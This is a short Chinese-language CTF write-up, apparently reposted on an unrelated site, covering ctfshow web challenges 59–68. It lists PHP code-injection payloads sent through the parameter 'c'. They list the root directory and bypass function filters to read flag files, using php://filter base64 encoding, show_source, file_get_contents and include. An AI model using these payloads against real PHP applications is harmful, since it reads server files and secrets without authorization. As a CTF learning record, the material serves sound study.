ctfshow学习记录 |
您所在的位置:网站首页 › ctfshow web入门99 › ctfshow学习记录 |
目录
web59-65web66web67web68
web59-65
解答:payload和web58一样。 payload1:c=include "php://filter/read=convert.base64-encode/resource=flag.php"; payload2:c=show_source('flag.php'); payload3:?c=file_get_contents('flag.php'); web66解答:show_source也被阻了,base64可以,不过flag没在flag.php里。 题目:题目显示的代码同web59 解答:print_r被过滤了。 c=var_dump(scandir("/"));打印目录,然后用include或者高亮显示flag。 web68题目:题目显示的代码同web59 解答:高亮highlight_file被过滤。 c=var_dump(scandir("/"));打印目录 c=include("/flag.txt"); 或者用伪协议base64一下依旧可以。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |